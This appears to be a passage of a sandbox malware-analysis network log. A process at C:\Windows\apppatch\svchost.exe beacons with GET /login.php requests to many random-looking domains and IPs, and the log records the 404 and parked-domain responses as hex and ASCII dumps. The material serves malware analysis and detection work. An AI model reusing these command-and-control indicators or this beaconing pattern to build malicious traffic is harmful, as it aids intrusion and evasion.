                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.967032909 CEST289OUTGET /dh/147287063_414682.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.36.143:8001
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.325288057 CEST722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:12 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          49192.168.2.957352103.224.212.108801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.368230104 CEST277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
                                                                                                                                                                                                          Cookie: __tad=1725785613.7387215
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.974900007 CEST244INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:54:12 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20240908-1854-12c0-8240-bdabdc5d8efa
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          50192.168.2.957353103.224.182.252801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.515113115 CEST277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
                                                                                                                                                                                                          Cookie: __tad=1725785614.8678415
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.155999899 CEST242INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:54:13 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          51192.168.2.957354154.85.183.50801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.589468956 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.488347054 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:13 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.908184052 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.230428934 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:14 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          52192.168.2.957355199.59.243.226801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.913089991 CEST350OUTGET /login.php?subid1=20240908-1854-12c0-8240-bdabdc5d8efa HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww25.lyxynyx.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1725785613.7387215
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.398124933 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:54:13 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1226
                                                                                                                                                                                                          x-request-id: 21d686d4-2b53-4837-b130-d05a6b735fbd
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OFKPQUU/BnWsdoATIezOPJPYzG/H4lUQfiveIE+6wfUBvddoUo1a+OJ8llGG3QEObOpBXIHY3R5kZbYWKb3MOQ==
                                                                                                                                                                                                          set-cookie: parking_session=21d686d4-2b53-4837-b130-d05a6b735fbd; expires=Sun, 08 Sep 2024 09:09:14 GMT; path=/
                                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 46 4b 50 51 55 55 2f 42 6e 57 73 64 6f 41 54 49 65 7a 4f 50 4a 50 59 7a 47 2f 48 34 6c 55 51 66 69 76 65 49 45 2b 36 77 66 55 42 76 64 64 6f 55 6f 31 61 2b 4f 4a 38 6c 6c 47 47 33 51 45 4f 62 4f 70 42 58 49 48 59 33 52 35 6b 5a 62 59 57 4b 62 33 4d 4f 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OFKPQUU/BnWsdoATIezOPJPYzG/H4lUQfiveIE+6wfUBvddoUo1a+OJ8llGG3QEObOpBXIHY3R5kZbYWKb3MOQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.398145914 CEST660INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjFkNjg2ZDQtMmI1My00ODM3LWIxMzAtZDA1YTZiNzM1ZmJkIiwicGFnZV90aW1lIjoxNzI1Nzg1NjU0LCJwYWdlX3VybCI6I


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          53192.168.2.95735664.190.63.136801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.974905014 CEST348OUTGET /login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1725785614.8678415
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635535002 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:54:14 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hxSxi4PBFmu0QNc2q+GSknygYkKo1n+KSAULi9DWq5iuwMw/XopOCCWE/U3DldKAcurRnNAvl7kzIkhxTkuCVw==
                                                                                                                                                                                                          last-modified: Sun, 08 Sep 2024 08:54:14 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7768d5b45d-sb6gc
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Raw: 38 37 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 68 78 53 78 69 34 50 42 46 6d 75 30 51 4e 63 32 71 2b 47 53 6b 6e 79 67 59 6b 4b 6f 31 6e 2b 4b 53 41 55 4c 69 39 44 57 71 35 69 75 77 4d 77 2f 58 6f 70 4f 43 43 57 45 2f 55 33 44 6c 64 4b 41 63 75 72 52 6e 4e 41 76 6c 37 6b 7a 49 6b 68 78 54 6b 75 43 56 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: 87E<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hxSxi4PBFmu0QNc2q+GSknygYkKo1n+KSAULi9DWq5iuwMw/XopOCCWE/U3DldKAcurRnNAvl7kzIkhxTkuCVw==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635571003 CEST1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                          Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635582924 CEST1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f
                                                                                                                                                                                                          Data Ascii: ine-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}butt
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635598898 CEST1236INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                          Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635617971 CEST1236INData Raw: 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72
                                                                                                                                                                                                          Data Ascii: -size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__conte
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635632038 CEST1236INData Raw: 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e
                                                                                                                                                                                                          Data Ascii: gin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635648012 CEST1236INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d
                                                                                                                                                                                                          Data Ascii: d-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-s
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635662079 CEST1236INData Raw: 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65
                                                                                                                                                                                                          Data Ascii: ransform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635674000 CEST1236INData Raw: 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61
                                                                                                                                                                                                          Data Ascii: -moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-hei
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.635687113 CEST91INData Raw: 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31
                                                                                                                                                                                                          Data Ascii: e}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-s
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.640705109 CEST1236INData Raw: 35 36 46 0d 0a 69 7a 65 3a 32 30 70 78 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f
                                                                                                                                                                                                          Data Ascii: 56Fize:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          54192.168.2.95705472.52.179.174801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.250695944 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          55192.168.2.95705572.52.179.174801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.762475967 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
